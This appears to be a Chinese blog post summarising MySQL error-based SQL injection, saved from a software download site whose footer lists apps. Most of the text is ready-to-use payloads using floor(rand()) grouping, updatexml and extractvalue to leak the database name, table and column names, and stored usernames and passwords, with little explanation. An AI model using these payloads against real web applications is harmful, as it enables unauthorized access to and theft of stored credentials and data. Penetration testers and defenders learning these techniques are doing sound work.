SQL报错注入总结
时间:2022-03-15 08:49
1.Floor()报错注入
关于Floor报错注入原理可以看
获取数据库
select count(*),(concat(0x3a,database(),0x3a,floor(rand()*2))) name from information_schema.tables group by name;
获取表名
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=‘bypass‘ limit 1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
获取字段名
select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name=‘pass‘ limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
获取内容
select count(*),concat(0x3a,0x3a,(select username from pass limit 1,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
2.updatexml报错注入
updatexml的爆错原因很简单,updatexml第二个参数需要的是Xpath格式的字符串。我们输入的显然不符合。故报错由此报错。
获取数据库
select updatexml(0,concat(0x7e,(select database())),0);
获取表名
select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0);
获取字段
select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name=‘pass‘ limit 1,1)),0);
获取内容
select updatexml(0,concat(0x7e,(SELECT concat(password) FROM pass limit 0,1)),0);
3.extractvalue()
select extractvalue(1,concat(0x7e,(select user()),0x7e));
剩下的就不一一列出来了,有兴趣的可以去查一下
热门排行
今日推荐
-
手机优化清理大师免费版
版本:v1.0.1
大小:27.24MB
日期:2024-11-05
-
趣铃声免费版
版本:v1.0.0.0..1221.1636
大小:11.10MB
日期:2024-11-05
-
抖视频去水印官方版
版本:v2.0.5
大小:21.70MB
日期:2024-11-05
-
手机游戏修改大师正版
版本:v1.5.1
大小:5.12MB
日期:2024-11-05
-
魔板视频官方版
版本:v1.0.6
大小:26.22MB
日期:2024-11-05
-
医拍即合官方版
版本:v2.4.3
大小:20.11MB
日期:2024-11-05
热门手游
-
战地世界免费版
版本:v1.5
大小:136.58MB
日期:2024-11-05
-
真实靶场训练营完整版
版本:v1.4
大小:39.70MB
日期:2024-11-05
-
绝地战场之求生安卓版
版本:v1.0.5
大小:21.72MB
日期:2024-11-05
-
花朵射手免费版
版本:v1.6.1
大小:35.78MB
日期:2024-11-05
-
僵尸城市生存大战正版
版本:v1.5
大小:84.00MB
日期:2024-11-05
-
夺宝兵团免费版
版本:v1.3.6
大小:12.85MB
日期:2024-11-05